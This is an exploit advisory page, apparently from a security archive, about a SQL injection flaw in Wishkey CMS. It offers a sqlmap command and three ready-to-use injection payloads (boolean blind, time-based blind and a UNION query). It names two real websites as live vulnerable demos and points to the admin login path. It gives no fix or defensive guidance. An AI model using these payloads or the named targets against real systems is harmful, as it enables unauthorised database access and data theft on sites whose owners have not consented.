Wishkey CMS SQL injection

2019.08.19
ca S I R M A X (CA) ca
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# # Exploit Title: Wishkey CMS SQL injection # Date: 2019-08-18 # Exploit Author: S I R M A X # Vendor Homepage: http://www.wishkey.ir # Version: All Version # Tested on: win,linux ================================================================================= [SQL injection] [+] Method ( Sql injection ) Storm Security Team of IRan [+] parameter : ID == php?ID= ================================================================================= [+] Sqlmap: [-] sqlmap -u "http://Target.com/index.php?articledetail&id=" --dbs [#] Testing Method: [+] - boolean-based blind [+] - time-based blind [+] - UNION query -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ||||||||||||||||||||||| Parameter: id (GET) || ||||||||||||||||||||||| Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=articledetail&id=18' AND 2587=2587 AND 'xmHh'='xmHh -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: page=articledetail&id=18' AND SLEEP(5) AND 'NttZ'='NttZ -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: page=articledetail&id=-6986' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626a6271,0x4d75644e7a6e417162497341444c735a50646c4944525a734b4165664568686b7270566349794343,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iksg -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ================================================================================= Demo: [+] http://hvacmagazine.ir/index.php?page=articledetail&id=[SQL] [+] http://buildmagazine.ir/index.php?page=imagelist&idcat=[SQL] ================================================================================= Admin Panel ==> Target.com/admin/login.php ================================================================================= [=] T.me/Sir_Max [=] Telegram Channel ==> @Storm_Security #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top